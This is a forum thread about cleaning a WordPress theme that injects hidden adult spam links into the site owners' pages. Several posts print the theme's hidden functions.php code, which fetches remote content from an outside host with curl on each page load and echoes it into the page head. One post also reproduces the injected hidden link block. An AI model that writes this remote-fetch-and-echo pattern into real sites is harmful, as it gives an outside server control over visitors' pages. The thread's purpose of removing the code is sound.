Y T Nuke  
Results 1 to 19 of 19
So i have this wp theme which i've gotto use, After a day of activating ...
  1. #1
    SahL's Avatar
    SahL is offline Elite Member
    Join Date
    Jan 2011
    Location
    Bombay
    Posts
    1,506
    Reputation
    349
    Thanks
    619
    Thanked 1,132 Times in 386 Posts

    Unhappy Help needed in Removing Hidden Links from a WP theme

    So i have this wp theme which i've gotto use, After a day of activating i see

    Adult keywords in description on google for this new website.

    I viewed the source and found some adult keywords linking to care2.com and magento webhosting.

    Deactivated this theme and everything was fine again, So its the theme which is causing it surely.

    Checked each and every file in the theme but couldnt get anything :O

    The code which i found by viewing source and download link of theme is below :

    Code found by view source:

    <div style="display:none"><h1><a href="http://www.wpdb.org/" title="wordpress plugins">wordpress plugins</a></h1><h1><a href="http://www.care2.com/c2c/groups/disc.html?gpp=31976&pst=1299981" title="cams live">cams live</a></h1><h1><a href="http://www.care2.com/c2c/groups/disc.html?gpp=31976&pst=1299981" title="Girls Cam">Girls Cam</a></h1><h1><a href="http://www.magentohostingz.com" title="magento webhosting">magento webhosting</a></h1><h1><a href="http://www.care2.com/c2c/groups/disc.html?gpp=31976&pst=1299981" title="girl webcam">girl webcam</a></h1><h1><a href="http://www.care2.com/c2c/groups/disc.html?gpp=31976&pst=1299981" title="Adult Webcam">Adult Webcam</a></h1><h1><a href="http://www.care2.com/c2c/groups/disc.html?gpp=31976&pst=1299981" title="sex webcam">sex webcam</a></h1><h1><a href="http://www.care2.com/c2c/groups/disc.html?gpp=32184&pst=1568081" title="Asian Webcams">Asian Webcams</a></h1><h1><a href="http://www.care2.com/c2c/groups/disc.html?gpp=31976&pst=1299981" title="adult web chat">adult web chat</a></h1><h1><a href="http://www.care2.com/c2c/groups/disc.html?gpp=31976&pst=1299981" title="sex on webcam">sex on webcam</a></h1><h1><a href="http://www.care2.com/c2c/groups/disc.html?gpp=31976&pst=1299981" title="sex video">sex video</a></h1><h1><a href="http://www.care2.com/c2c/groups/disc.html?gpp=31976&pst=1299981" title="sex chating">sex chating</a></h1><h1><a href="http://www.care2.com/c2c/groups/disc.html?gpp=31976&pst=1299981" title="sex video">sex video</a></h1><h1><a href="http://www.care2.com/c2c/groups/disc.html?gpp=31984&pst=1564667" title="sex date">sex date</a></h1><h1><a href="http://www.care2.com/c2c/groups/disc.html?gpp=31984&pst=1564667" title="Adult dating websites">Adult dating websites</a></h1></div>

    Theme DL link:

    Code:
    http://www.mediafire.com/?ej2y0bmxabbddog
    Virus Total : Detection ratio: 0 / 39

    Code:
    https://www.virustotal.com/file/4fe2c6d268e3fc9bc2b6775e21f56f37a3ac8cef0e39e2fd010dbb0f06474172/analysis/1327982943/
    Help from anyone would be very much appreciated.

    Thank you!
    Last edited by SahL; 01-31-2012 at 02:18 AM.

  2. #2
    itzcorky's Avatar
    itzcorky is offline Junior Member
    Join Date
    Nov 2011
    Location
    Springfield, Ohio
    Posts
    140
    Reputation
    63
    Thanks
    6
    Thanked 59 Times in 34 Posts

    Default Re: Help needed in Removing Hidden Links from a WP theme

    I will go through and find all the keywords and links and then remove them and then I will add a txt file in the rar which will point to all the files that had keywords and such that way you can add your own.

  3. #3
    sawangan's Avatar
    sawangan is offline Regular Member
    Join Date
    Jan 2009
    Location
    SG-ID-AU
    Posts
    341
    Reputation
    34
    Thanks
    115
    Thanked 22 Times in 19 Posts

    Default Re: Help needed in Removing Hidden Links from a WP theme

    if your jquery links to wpstats.org that might be the problem
    i noticed this problem few days ago, and then i change the jquery to another source and that strange links is gone.
    if you are using wordpress..just look at functions.php at the theme that you are using right now.

    a lot of people might experience the same because until now the bug (or hacked) have not being fixed.
    source: http://wordpress.org/support/topic/u...my-source-file
    Last edited by sawangan; 01-31-2012 at 02:36 AM.

  4. The Following 2 Users Say Thank You to sawangan For This Useful Post:

    PabloEscobar (02-16-2012), SahL (01-31-2012)

  5. #4
    dvs one's Avatar
    dvs one is offline Junior Member
    Join Date
    Sep 2009
    Location
    yay area
    Posts
    125
    Reputation
    11
    Thanks
    50
    Thanked 21 Times in 13 Posts

    Default Re: Help needed in Removing Hidden Links from a WP theme

    goto your ftp and then goto wp-contents -> themes -> select your theme and look for footer.php its most likely there.. it may be encrypted but i highly doubt it.. just remove the necessary code

  6. #5
    itzcorky's Avatar
    itzcorky is offline Junior Member
    Join Date
    Nov 2011
    Location
    Springfield, Ohio
    Posts
    140
    Reputation
    63
    Thanks
    6
    Thanked 59 Times in 34 Posts

    Default Re: Help needed in Removing Hidden Links from a WP theme

    Ok so all you need to do is upload the theme and then activate it and then edit it and you will find them.

  7. #6
    SahL's Avatar
    SahL is offline Elite Member
    Join Date
    Jan 2011
    Location
    Bombay
    Posts
    1,506
    Reputation
    349
    Thanks
    619
    Thanked 1,132 Times in 386 Posts

    Default Re: Help needed in Removing Hidden Links from a WP theme

    Quote Originally Posted by itzcorky View Post
    I will go through and find all the keywords and links and then remove them and then I will add a txt file in the rar which will point to all the files that had keywords and such that way you can add your own.
    Quote Originally Posted by dvs one View Post
    goto your ftp and then goto wp-contents -> themes -> select your theme and look for footer.php its most likely there.. it may be encrypted but i highly doubt it.. just remove the necessary code
    if you can find them that would be great!

    Quote Originally Posted by itzcorky View Post
    Ok so all you need to do is upload the theme and then activate it and then edit it and you will find them.
    yes i tried to find it but cudnt anywhere in the theme files.

    Footer.php doesnt have any simple links nor in encoded form.

    Checked with TAC. Havent found any thing.

  8. #7
    SahL's Avatar
    SahL is offline Elite Member
    Join Date
    Jan 2011
    Location
    Bombay
    Posts
    1,506
    Reputation
    349
    Thanks
    619
    Thanked 1,132 Times in 386 Posts

    Default Re: Help needed in Removing Hidden Links from a WP theme

    Quote Originally Posted by sawangan View Post
    if your jquery links to wpstats.org that might be the problem
    i noticed this problem few days ago, and then i change the jquery to another source and that strange links is gone.
    if you are using wordpress..just look at functions.php at the theme that you are using right now.

    a lot of people might experience the same because until now the bug (or hacked) have not being fixed.
    source: http://wordpress.org/support/topic/u...my-source-file
    doesnt link there but as you can see in the above code..the first link goes to ..www.wpdb dot org

    Searched Function.php, cdnt find anything.

  9. #8
    TeddyKGB's Avatar
    TeddyKGB is offline Newbies
    Join Date
    Apr 2010
    Location
    East
    Posts
    16
    Reputation
    20
    Thanks
    3
    Thanked 11 Times in 7 Posts

    Default Re: Help needed in Removing Hidden Links from a WP theme

    I had this issue once, where just like you i knew I had checked all the files etc. Turned out the links were actually encoded in a .GIF image. Open all the img files in a text editor and see if you see anything strange.

  10. #9
    Jared255's Avatar
    Jared255 is offline SolidRanks™
    Join Date
    May 2009
    Posts
    1,300
    Reputation
    173
    Thanks
    403
    Thanked 596 Times in 310 Posts

    Default Re: Help needed in Removing Hidden Links from a WP theme

    I feel your pain bro... had to buy my first WP theme ever recently... couldn't figure out how to get the footer links out... $20
    SolidRanks™ Coming Soon

  11. The Following User Says Thank You to Jared255 For This Useful Post:

    SahL (01-31-2012)

  12. #10
    SahL's Avatar
    SahL is offline Elite Member
    Join Date
    Jan 2011
    Location
    Bombay
    Posts
    1,506
    Reputation
    349
    Thanks
    619
    Thanked 1,132 Times in 386 Posts

    Default Re: Help needed in Removing Hidden Links from a WP theme

    Quote Originally Posted by TeddyKGB View Post
    I had this issue once, where just like you i knew I had checked all the files etc. Turned out the links were actually encoded in a .GIF image. Open all the img files in a text editor and see if you see anything strange.
    wahttt? in a .gif image??

    Wil check them. Thanks!

    Quote Originally Posted by Jared255 View Post
    I feel your pain bro... had to buy my first WP theme ever recently... couldn't figure out how to get the footer links out... $20
    this ones for $35, im gonna use it for a semi auto blog :O
    ------

    c'mon there must be some one on BHW who has encoded such links and knows how to remove em.

    Help please!

  13. #11
    argh11's Avatar
    argh11 is offline Junior Member
    Join Date
    Jul 2011
    Location
    USA
    Posts
    169
    Reputation
    49
    Thanks
    134
    Thanked 34 Times in 28 Posts

    Default Re: Help needed in Removing Hidden Links from a WP theme

    Oh man this is all I have been doing lately.

    And I have run accross the encoded .gif also...blech!

    Anyway, I will take a look at it for you.

    -argh11

  14. The Following User Says Thank You to argh11 For This Useful Post:

    SahL (01-31-2012)

  15. #12
    sawangan's Avatar
    sawangan is offline Regular Member
    Join Date
    Jan 2009
    Location
    SG-ID-AU
    Posts
    341
    Reputation
    34
    Thanks
    115
    Thanked 22 Times in 19 Posts

    Default Re: Help needed in Removing Hidden Links from a WP theme

    Quote Originally Posted by SahL View Post
    doesnt link there but as you can see in the above code..the first link goes to ..www.wpdb dot org

    Searched Function.php, cdnt find anything.
    are you sure lookin on the functions.php?
    it is on the first line, you really can't miss that..

    actual coding
    Code:
    if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url = "http://www.wpstats.org/jquery-1.6.3.min.js";$ch = curl_init();    $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}
    replace with
    Code:
    if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url = "http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.6.3.min.js";$ch = curl_init();    $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}
    problem solved

  16. The Following User Says Thank You to sawangan For This Useful Post:

    SahL (01-31-2012)

  17. #13
    argh11's Avatar
    argh11 is offline Junior Member
    Join Date
    Jul 2011
    Location
    USA
    Posts
    169
    Reputation
    49
    Thanks
    134
    Thanked 34 Times in 28 Posts

    Default Re: Help needed in Removing Hidden Links from a WP theme

    Well looks like a tricky one...arn't they all!

    Anyway Sawangan was right about the wpstats thing.

    You can look in your functions file and near the top it shows

    Code:
    $url = "http://www.wpstats.org/jquery-1.6.3.min.js";
    simply change it to something like:

    Code:
    $url = "http://www.nothingtoseehere.com";
    or you can get the fixed theme here:

    http://www.mediafire.com/?qdtagiwwhw15v9b


    Virustotal
    Code:
    https://www.virustotal.com/file/7cb0939289e4ffade8c2616061a0870bec3d514993f545621e0b7bc405332799/analysis/1327995441/

    Cheers!

    -argh11

  18. The Following User Says Thank You to argh11 For This Useful Post:

    SahL (01-31-2012)

  19. #14
    argh11's Avatar
    argh11 is offline Junior Member
    Join Date
    Jul 2011
    Location
    USA
    Posts
    169
    Reputation
    49
    Thanks
    134
    Thanked 34 Times in 28 Posts

    Default Re: Help needed in Removing Hidden Links from a WP theme

    lol, you were a couple minutes quicker than me


    Edit: It looks like Sawangan's fix is most likely better...as he keeps the java source file (just re-directs it to a known good one). This way your java is not broken.

    disclaimer: *I don't know java that well yet*
    Last edited by argh11; 01-31-2012 at 05:47 AM. Reason: java source code

  20. The Following User Says Thank You to argh11 For This Useful Post:

    SahL (01-31-2012)

  21. #15
    SahL's Avatar
    SahL is offline Elite Member
    Join Date
    Jan 2011
    Location
    Bombay
    Posts
    1,506
    Reputation
    349
    Thanks
    619
    Thanked 1,132 Times in 386 Posts

    Default Re: Help needed in Removing Hidden Links from a WP theme

    Quote Originally Posted by sawangan View Post
    are you sure lookin on the functions.php?
    it is on the first line, you really can't miss that..

    actual coding
    Code:
    if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url = "http://www.wpstats.org/jquery-1.6.3.min.js";$ch = curl_init();    $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}
    replace with
    Code:
    if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url = "http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.6.3.min.js";$ch = curl_init();    $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_:headbang:', 'insert_jquery_theme');}
    problem solved

    Oh! i was searching for wpdb.org links in function.php :O :P


    I replaced it, it started showing the javascript on the webpage

    Screenshot: http://awesomescreenshot.com/022t7tk55

    so i replaced it with http://www.nothingtoseehere.com"

    Working Good now!!!

    Thanks alot man!!


    Quote Originally Posted by argh11 View Post
    Well looks like a tricky one...arn't they all!

    Anyway Sawangan was right about the wpstats thing.

    You can look in your functions file and near the top it shows

    Code:
    $url = "http://www.wpstats.org/jquery-1.6.3.min.js";
    simply change it to something like:

    Code:
    $url = "http://www.nothingtoseehere.com";
    or you can get the fixed theme here:

    http://www.mediafire.com/?qdtagiwwhw15v9b


    Virustotal
    Code:
    https://www.virustotal.com/file/7cb0939289e4ffade8c2616061a0870bec3d514993f545621e0b7bc405332799/analysis/1327995441/

    Cheers!

    -argh11
    Thanks bro, Your Fix Worked! , Fix and Upload both appreciated a lot.

    BHW
    Last edited by SahL; 01-31-2012 at 06:24 AM.

  22. #16
    Quazpolter is offline Newbies
    Join Date
    Dec 2011
    Posts
    40
    Reputation
    10
    Thanks
    4
    Thanked 3 Times in 3 Posts

    Default Re: Help needed in Removing Hidden Links from a WP theme

    don't download themes from anywhere but wordpress.org or a reputable premium

    I downloaded thesis from some corner of the internet and it had code pulling some jscript from j-query.org

    I only found out because it 404'd

  23. #17
    Vermino's Avatar
    Vermino is offline Newbies
    Join Date
    Jan 2012
    Posts
    27
    Reputation
    10
    Thanks
    11
    Thanked 1 Time in 1 Post

    Default Re: Help needed in Removing Hidden Links from a WP theme

    Isn't it fun looking for bullsh*t content in WP themes? like an Easter egg hunt haha

  24. #18
    davidatunlea is offline Newbies
    Join Date
    Aug 2011
    Posts
    1
    Reputation
    10
    Thanks
    0
    Thanked 0 Times in 0 Posts

    Default Re: Help needed in Removing Hidden Links from a WP theme

    I'm having the same issue but changing the code in functions.php has not removed the link anybody have any other advice?? The links are to the same site as the first post on this thread. I have ran queries and check for hidden links in base64_encode php functions and haven't found anything anywhere. Any help would be greatly appreciated.
    Last edited by davidatunlea; 02-29-2012 at 05:26 AM.

  25. #19
    piardog is offline Newbies
    Join Date
    Feb 2009
    Location
    Ireland
    Posts
    11
    Reputation
    10
    Thanks
    58
    Thanked 0 Times in 0 Posts

    Default Re: Help needed in Removing Hidden Links from a WP theme

    [QUOTE=SahL;3786557]So i have this wp theme which i've gotto use, After a day of activating i see

    Adult keywords in description on google for this new website.

    I viewed the source and found some adult keywords linking to care2.com and magento webhosting.

    Deactivated this theme and everything was fine again, So its the theme which is causing it surely.

    Checked each and every file in the theme but couldnt get anything :O

    The code which i found by viewing source and download link of theme is below :

    Code found by view source:





    I had similar problem but it was the database plugin backup buddy was doing it.

    Once iremoved the plugin all the crap went away.

Natural Slow Link Building


SEO Blasts - High quality link building service

Similar Threads

  1. Replies: 5
    Last Post: 11-21-2011, 04:24 PM
  2. Weird hidden links
    By OzGold in forum Black Hat SEO
    Replies: 12
    Last Post: 10-08-2011, 12:47 PM
  3. Hiding links in wordpress theme...how do they do it?
    By ntnsllc in forum Black Hat SEO
    Replies: 5
    Last Post: 06-03-2011, 02:24 PM
  4. Eshop Theme Guidance Needed
    By richv100 in forum General Programming Chat
    Replies: 6
    Last Post: 02-04-2011, 05:12 PM

Tags for this Thread

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  
  SEnukeX SEO Software
Proudly Powered by Hostwinds.com Web Hosting Click Here For Exclusive BHW Discounts!

Cheap Web Hosting


1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76